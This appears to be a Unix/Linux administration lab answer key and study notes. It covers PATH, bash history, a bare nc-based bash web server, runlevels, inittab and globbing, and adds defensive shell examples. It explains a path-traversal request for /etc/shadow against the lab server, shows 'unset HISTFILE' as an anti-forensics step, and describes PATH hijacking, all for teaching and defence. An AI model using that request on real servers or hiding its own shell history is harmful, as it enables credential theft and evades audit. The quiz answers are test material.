/usr/sbin/ifconfig
Change the entries in PATH by entering the following text into the shell window.
# PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/home/intern01/.local/bin:/home/intern01/bin

Run the following and record the results:


# ifconfig -a

Run the ifconfig -a command in the root shell window using the full file path and record the syntax used.

/usr/sbin/ifconfig -a

Explain why the PATH variable is important.


Run the following commands to add the /usr/sbin directory back into the PATH variable and examine the contents of the variable:

# echo $PATH
# export PATH=${PATH}:/usr/sbin
# echo $PATH
# ifconfig -a
The path variable indicates where to look for binaries when running a program from the command line. If a path is not present inside of
the PATH variable, the complete path name must be used to run the program.
Exercise Takeaway
Always use full command paths in scripts and when running privileged commands. It is hard to predict what PATH will look like in a given
environment: a command that is not on the PATH simply fails, and, worse, if a directory the attacker can write to appears earlier in PATH than
the real binary, the user runs the attacker's copy of the command instead.
The su command without a dash (su root) switches the effective user to root but keeps the caller's environment and working directory, which is why root's shell above still had intern01's PATH (no /usr/sbin) and was sitting in /home/intern01; su - root starts a login shell with root's own environment.
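The following added example (not part of the lab) turns the takeaway into a check: it audits a PATH string for the two conditions that make command hijacking possible, empty or relative entries and world-writable directories, and produces a cleaned PATH. The stand-alone run uses the caller's real PATH; the function names are this example's own, and skipping directories that do not exist is an assumption of the check.

```shell
#!/bin/sh
# Added example, not part of the lab: audit a PATH for entries that let
# another user plant a look-alike command. Empty or relative entries are
# resolved against the current directory (so "cd /tmp; ls" could run /tmp/ls),
# and a world-writable directory lets anyone drop a binary in. Directories that
# do not exist are skipped; they cannot be searched until someone creates them.

# world_writable DIR -> 0 if the "other" write bit is set (char 9 of ls -ld)
world_writable() {
    mode=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    case $mode in
        ????????w?) return 0 ;;
        *) return 1 ;;
    esac
}

# path_audit PATHSTRING -> prints "entry|reason" per bad entry; returns 1 if any
path_audit() {
    rc=0
    oldifs=$IFS; IFS=:
    set -f                                   # no globbing while splitting on ':'
    for entry in $1; do
        case $entry in
            "") printf '%s|%s\n' "(empty)" "resolves to the current directory"; rc=1 ;;
            /*) if [ -d "$entry" ] && world_writable "$entry"; then
                    printf '%s|%s\n' "$entry" "world-writable"; rc=1
                fi ;;
            *)  printf '%s|%s\n' "$entry" "relative entry"; rc=1 ;;
        esac
    done
    set +f; IFS=$oldifs
    return $rc
}

# path_clean PATHSTRING -> prints the PATH with the flagged entries removed
path_clean() {
    out=
    oldifs=$IFS; IFS=:
    set -f
    for entry in $1; do
        case $entry in
            /*) if [ -d "$entry" ] && world_writable "$entry"; then continue; fi
                out=${out:+$out:}$entry ;;
        esac
    done
    set +f; IFS=$oldifs
    printf '%s\n' "$out"
}

# Stand-alone run: report on the current shell's PATH
if path_audit "$PATH"; then
    echo "PATH looks safe: $PATH"
else
    echo "suggested PATH: $(path_clean "$PATH")"
fi
```

The check deliberately treats a sticky world-writable directory such as /tmp as unsafe too: the sticky bit only stops other users deleting your files, not creating a new one called ifconfig there.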
The /proc directory contains a folders named after currently running processes. Record the command used to view the environ file of
the current shell's parent process.

# cat /proc/$PPID/environ
Pipe the output of the previous command to the following tr command to clean up the output and determine the value of the SHELL
environment variable:

tr '\0' '\n'
Note: The environ file uses the null character (\0, ASCII 0) instead of the newline character (\n, or ASCII 10) to separate records. This
command will replace the null character with a newline to make the output legible.

cat /proc/$PPID/environ | tr '\0' '\n'


This command will produce a cleaner output.

cat /proc/$PPID/environ | tr '\0' '\n' | grep SHELL


SHELL=/bin/bash
On the Solaris machine, use the pargs command to view the system environment information.

# pargs -e $PPID
Complete the following steps and explain the differences in the ps command output:

 In another terminal, SSH into the CentOS machine


 Log in as the intern01 user
 Change to the root user
 Run the following in both terminals:

# ps -ef | grep $$

Both SSH shells are spawned by different parent processes.


Run the following in the new terminal without giving the full path and record the results:

# ifconfig -a
The command executes because the environment variables of the new shell have not been modified.

Log into the Solaris machine as root and enter the following. Record any differences between ls and ls -a:

# cd ~
# ls
# ls -a
The -a option of the ls command displays hidden files. Hidden files are notated by a period at the beginning of the file name.

Look at the last line of the .bash_history file using the tail command and answer the following:

 What syntax/command was used?


 Is the last command reported also the last command run?
 tail -1 ~/.bash_history
The last command reported in the .bash_history file was the last command of the previous shell session.
Complete the following on the Solaris machine:

 Without closing the console window, logout and logon.


 Look at the last 10 commands in the .bash_history file using tail.

Answer the following:

 Are the commands from the previous login session shown?


 Press the up arrow. Which command appears?
 Commands from the previous session are still there.
 The history file is read when the new shell starts, so pressing the up arrow shows the last command run in the previous session.
SSH into the CentOS machine as the intern01 user and run the following:

$ su root
# who am i
# exit
$ exit

 Which commands were written to root's command history?


 Which commands were written to intern01's command history?
intern01's history (the commands typed in intern01's shell):
su root
exit
root's history (the commands typed in the root shell, written to /root/.bash_history when that shell exited):
who am i
exit
The su command itself appears only in intern01's history.
SSH into the CentOS machine as the intern01 user and run the following:
$ su root
# cat /var/log/secure
# exit
$ exit
Was the cat command written to root's .bash_history file?
Yes. Both cat /var/log/secure and exit are written to root's history file when the root shell exits.

SSH into the CentOS machine as the intern01 user and run the following:

$ su root
# cd /var
# cd log
# head messages
# unset HISTFILE
# exit
$ exit
Are any of the commands written to root's history?
No. unset HISTFILE removes the name of the file bash saves its history to, so when the shell exits nothing is written (the commands existed only in that session's in-memory history). This is a common anti-forensics step: shell history is trivially suppressed or edited and should never be relied on as an audit record; use auditd (or pam_tty_audit) when keystroke-level logging of root is required.

Use the shell script below to answer the following:


Contents of web.sh:
#!/bin/bash
base="/var/www"
default_port=8080
function serve {
read request                       # request line, e.g. "GET /temp.html HTTP/1.1"
while /bin/true; do
read header                        # consume headers until the blank line (a lone CR)
[ "$header" == $'\r' ] && break
done
url="${request#GET }"              # strip the leading method ...
url="${url% HTTP/*}"               # ... and the trailing protocol version
filename="$base$url"               # map the URL path straight under $base (no validation)
if [ -f "$filename" ]; then
echo -e "HTTP/1.1 200 OK\r"
echo -e "Content-Type: text/html\r"
echo -e "Content-Length: `ls -l $filename | awk '{ print $5 }'`\r"
echo -e "\r"
cat "$filename"
echo -e "\r"
else
echo -e "HTTP/1.1 404 Not Found\r"
echo -e "Content-Type: text/html\r"
echo -e "\r"
echo -e "404 Not Found\r"
echo -e "Not Found <br/> The requested resource was not found\r"
echo -e "\r"
fi
echo -e "\004"                     # EOT marks the end of the response for nc
exit
}
rm -f www_fifo
mkfifo www_fifo                    # named pipe that feeds serve's output back into nc
port="$default_port"
[ $# -gt 1 ] && port="$2"          # only the SECOND argument overrides the port
echo "Starting WWW on port $port..."
while true; do
(cat www_fifo) | nc -l $port | ( serve > www_fifo )   # one request per nc invocation
done

Save the following as temp.html in the /var/www directory:

<html>
<body>
Hello!
</body>
</html>
# ps -lA | grep web.sh
0 S 0 67339 67213 0 80 0 - 28283 do_wai pts/1 00:00:00 web.sh
1 S 0 67516 67339 0 80 0 - 28283 pipe_w pts/1 00:00:00 web.sh
All processes with a parent of the script:
# ps -lfA | grep 67339
0 S root 67339 67213 0 80 0 - 28283 do_wai 14:27 pts/1 00:00:00 /bin/bash ./web.sh
0 S root 67514 67339 0 80 0 - 26981 pipe_w 14:27 pts/1 00:00:00 cat www_fifo
0 S root 67515 67339 0 80 0 - 11004 poll_s 14:27 pts/1 00:00:00 nc -l 8080
1 S root 67516 67339 0 80 0 - 28283 pipe_w 14:27 pts/1 00:00:00 /bin/bash ./web.sh
Explain what the web.sh script is doing.

The web.sh script is a minimal BASH web server. For each connection that nc -l accepts, serve reads the request line, discards the headers, takes the path out of the GET line, maps it directly under /var/www and writes either the file with a 200 response or a 404 response back through the www_fifo named pipe into nc, which delivers it to the client.
Nothing validates the path: filename is just "$base$url" and the only check is [ -f ], so a request such as GET /../../etc/shadow HTTP/1.1 passes the test and, because the script runs as root, returns /etc/shadow. Only GET is handled; any other method leaves the method text in the path and yields a 404.

Run the web.sh script to find the temp.html file using the machine's web browser and record which URL was used.

localhost:8080/temp.html
Or

127.0.0.1:8080/temp.html
Or

<CentOS IP>:8080/temp.html
Which line of the script provides the branch that ensures a file exists in the /var/www directory?

13 if [ -f "$filename" ]; then
Close the web server and open it with a new invocation that will cause the script to listen on port 8082.

 What syntax/command was used?


 What is the function of the first command-line argument?
 # ./web.sh blah 8082
 The first argument ($1) is not used at all in the script. The second argument ($2) indicates the non-default port to use.
Review the following:

echo -e "Content-Length: `ls -l $filename | awk '{ print $5 }'`\r"


 Does this line use the fifth command-line argument to the script?
 Why or why not?

This line does not indicate a script argument. It indicates an argument to the awk command.
The fifth column of the long listing of a file indicates its file size.

# ls -l /var/www/temp
-rw-r--r--. 1 root root 37 Nov 6 14:42 /var/www/temp
The output of the ls -l command is piped to the awk command, which uses $5 to indicate the fifth column of the data it received
should be displayed.

# ls -l /var/www/temp | awk '{ print $5 }'


37
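As an added example that is not part of the lab or of web.sh, here is the path mapping web.sh should have done instead of filename="$base$url": it normalises the request path and refuses traversal, and a companion check insists on a plain regular file (no symlinks) before anything is served. The function names and the sample request paths are constructed for this example.

```shell
#!/bin/sh
# Added example, not part of web.sh: map a request path under the document
# root without letting ".." escape it. The query string is dropped, the path
# must be absolute, "." and empty segments are ignored, and any ".." segment
# is refused outright rather than "normalised" (so /a/../../etc/shadow is
# rejected instead of silently becoming /var/www/etc/shadow or worse).

# safe_path BASE URLPATH -> prints the file path, or returns 1 if unsafe
safe_path() {
    base=$1
    url=${2%%\?*}                      # drop "?query"
    case $url in
        /*) ;;
        *)  return 1 ;;                # must start with "/"
    esac
    out=$base
    oldifs=$IFS; IFS=/
    set -f                             # no globbing of the segments
    set -- $url
    set +f; IFS=$oldifs
    for seg in "$@"; do
        case $seg in
            ""|.) continue ;;          # "//" and "/./" add nothing
            ..)   return 1 ;;          # traversal attempt
        esac
        out="$out/$seg"
    done
    printf '%s\n' "$out"
}

# servable PATH -> 0 only for a regular file that is not a symbolic link,
# so a link dropped into the document root cannot point at /etc/shadow
servable() {
    [ -f "$1" ] && [ ! -L "$1" ]
}

# Stand-alone run: show how a few constructed request paths are handled
for req in /temp.html '/a/./b.html?x=1' /../../etc/shadow relative.html; do
    if p=$(safe_path /var/www "$req"); then
        echo "$req -> $p"
    else
        echo "$req -> rejected"
    fi
done
```

In web.sh the two checks would replace the filename="$base$url" line and the [ -f "$filename" ] test; percent-decoding of the URL would still have to happen before safe_path, since %2e%2e is another spelling of "..".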
A runlevel is an indicator that the init command uses to determine which lines of the /etc/inittab file are relevant for the desired
running configuration.
Match the runlevel with the appropriate use (assuming a Linux SystemV OS).
Multi-user mode with networking enabled → 3
Extra, typically unused by the system → 4
Shutdown → 0
Multi-user mode with networking and GUI enabled → 5
Single-user mode → 1
Reboot → 6
Multi-user mode with no networking enabled → 2

What command should be run to view the current runlevel when working with systemd?

runlevel
who -r
Either is correct; systemd keeps the runlevel record in utmp for compatibility. systemctl list-units --type=target shows the active targets directly, while systemctl get-default shows the default target rather than the current one.
What file does the init command rely on to determine what to do when booting or changing the runlevel?

/etc/inittab or inittab
What command ensures that the httpd service does not start on boot when working with systemd?
Note: You may want to run the command on your CentOS machine to verify that it works.
systemctl disable httpd
Log in at the console. Assume that no other users are logged in to the system and that no commands have run.
Which process would you expect to see running on a SystemV system but NOT on a Solaris system?

According to the diagram, the SystemV system would have init, login and a shell running after a console login, whereas the Solaris system
would have init and the shell only (no login process remains). On SystemV, init forks a copy of itself, which execs getty; getty execs login;
once someone logs in, login forks a child, which execs the shell.

Type the ls command (use shell expansion) to list all filenames that begin with the letter "a".
Note: Shell expansion (globbing) looks similar to regular expressions but is not the same: * matches any string, ? matches exactly one character, and [...] matches one character from the set.
ls a*

Assume these commands are run in a BASH Shell on a CentOS machine. Use shell expansion to match all filenames that begin with the
letter "e" or the letter "d".

ls [de]*

Assume these commands are run in a BASH Shell on a CentOS machine. Use the ls command and shell expansion to match all
filenames that contain the sequence "ea."

ls *ea*

Assume these commands are run in a BASH Shell on a CentOS machine. Use the ls command and shell expansion to match all
filenames that do not end with the letter "r."
ls *[!r]

Which system calls are used to run a program?

Fork (), exec ()

Which command will cause the contents of file1 to be appended to file2?

The correct answer is: cat < file1 >> file2

Which signals cannot be handled by a program?

The correct answers are: SIGKILL, SIGSTOP

When a user presses Ctrl+Z to stop a process, that process will still exist in the process list.

True

Use the following output to identify the fourth script/executable referenced in the inittab that will run upon booting into the default
runlevel.
# cat /etc/inittab
id:3:initdefault:

# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
x0:0:wait:/etc/rc.d/rc 0
x1:1:wait:/etc/rc.d/rc 1
x2:2:wait:/etc/rc.d/rc 2
x3:3:wait:/etc/rc.d/rc 3
x4:4:wait:/etc/rc.d/rc 4
x5:5:wait:/etc/rc.d/rc 5
x6:6:wait:/etc/rc.d/rc 6

# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
# When our UPS tells us power has failed, assume we have a few minutes
# of power left. Schedule a shutdown for 2 minutes from now.
# This does, of course, assume you have powered installed and your
# UPS connected and working correctly.
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
# If power was restored before the shutdown kicked in, cancel it.
pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
Explanation
# Any lines that begin with (#) are considered comments and are not executed
id:3:initdefault: (Sets the default run level for the box, not a script)
si::sysinit:/etc/rc.d/rc.sysinit (Always executed, script 1)
x3:3:wait:/etc/rc.d/rc 3 (Executed because 3 is the default run level, script 2)
The following are conditional, so they won’t execute automatically.
ca::ctrlaltdel:/sbin/shutdown -t3 -r now (Not an external script)
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"
1:2345:respawn:/sbin/mingetty tty1 (Script 3)
2:2345:respawn:/sbin/mingetty tty2 (Script 4)

The correct answer is: 2:2345:respawn:/sbin/mingetty tty2


Use shell expansion to list all files in a directory whose names start with the letter "r" and are exactly three characters long (including the "r").

Answer: ls r??
Shell expansion and patterns
? Matches exactly one character
?? Matches exactly two characters
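To see the pattern behave against real names, including the two cases that trip scripts up (dotfiles are not matched, and a pattern with no match is passed through literally), the function below is an added example, not from the course notes. It builds a scratch directory with constructed file names (r, ra, rab, rabc, sab and .rab, all assumptions for the example) and prints what a given pattern expands to there.

```shell
#!/bin/sh
# Added example (not from the course notes): show what r?? does and does
# not match, using a scratch directory with constructed file names.

# Print the names that pattern $1 expands to inside a scratch directory
# containing the constructed files: r ra rab rabc sab .rab
glob_in_scratch() {
    dir=$(mktemp -d) || return 1
    ( cd "$dir" || exit 1
      for f in r ra rab rabc sab .rab; do : > "$f"; done
      # $1 is deliberately unquoted so the shell expands the pattern
      # before printf sees it, exactly as it would for ls r??
      printf '%s\n' $1 )
    rc=$?
    rm -rf "$dir"
    return $rc
}

# Usage: r?? matches only rab (exactly three characters; the dotfile is skipped).
glob_in_scratch 'r??'
# r* matches r ra rab rabc, still without .rab
glob_in_scratch 'r*'
# Caveat: with no match the pattern is passed through literally, so a script
# running rm z?? would try to delete a file literally named z??.
glob_in_scratch 'z??'
```

The third call is the one worth remembering when writing cleanup or deployment scripts: an unmatched glob does not become empty, it becomes the pattern string itself, so check for the literal pattern (or use bash's nullglob/failglob) before acting on expansion results.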
Type the name of the BASH shell command history logfile on a CentOS machine.

Answer: ~/.bash_history (the default value of $HISTFILE, written when an interactive shell exits). The following command, typed inside a BASH shell, displays its location:
# echo $HISTFILE
Caveat: the location is an ordinary per-user shell variable, so a user can point it elsewhere or unset it, and a shell that is killed before it exits writes nothing, so treat the file as useful but incomplete evidence of what was typed.
System V: a major common ancestor of many Unix systems, released by AT&T in 1983. Page 5

Systemd: the replacement for SysV. Page 5

Solaris page 6

Processes first discussed on page 8; exec() and fork() on page 8

Change permissions, absolute and relative, page 16

Special bits SUID, SGID, sticky page 17

Timestamps mtime, atime, ctime page 18

timedatectl page 19

stat command page 21, e.g. stat /usr/local/config

truss -f -v "lstat,lstat64" ls -d /etc/passwd 2>&1 | grep "[amc]t = " (used before Solaris 10) page 21

Hard links page 22, soft links page 23

which command page 24, locate page 25, find page 26, mount page 27, recover a file page 27, df -h page 28

Kernel threads page 36, parent/child relationships page 37, zombie processes page 38, Solaris process list page 39

Process list fields page 40, Linux process list page 41, lsof page 43, /proc page 44

init page 54, runlevels page 54, System V page 54, /etc/inittab page 55, /etc/rc.d/rc page 58, startup scripts
rc.sysinit and /etc/inittab page 59, chkconfig page 59, service mysvc start page 60, System V management commands
page 60, SysV drawbacks page 61, runlevel comparison page 62, Service Management Facility (SMF) page 62, svcs
(like chkconfig, manages which services start at boot) page 62, systemd page 63, system service management commands
page 64, systemctl page 64, init process runs after system startup page 68, getty page 68, shell initialization
page 69, secure shell initialization page 69, common shells page 70, shell features page 71, stdin, stdout, stderr
page 72, job control page 72, bg and fg commands page 73, SIGKILL, SIGHUP, SIGSTOP, SIGTERM, SIGTSTP, SIGINT page 74,
redirection page 74, expansion and patterns in the bash shell page 75, command substitution page 77, shell modes, login vs
non-login page 78, HISTFILE and HISTSIZE page 83, scripting fundamentals page 85
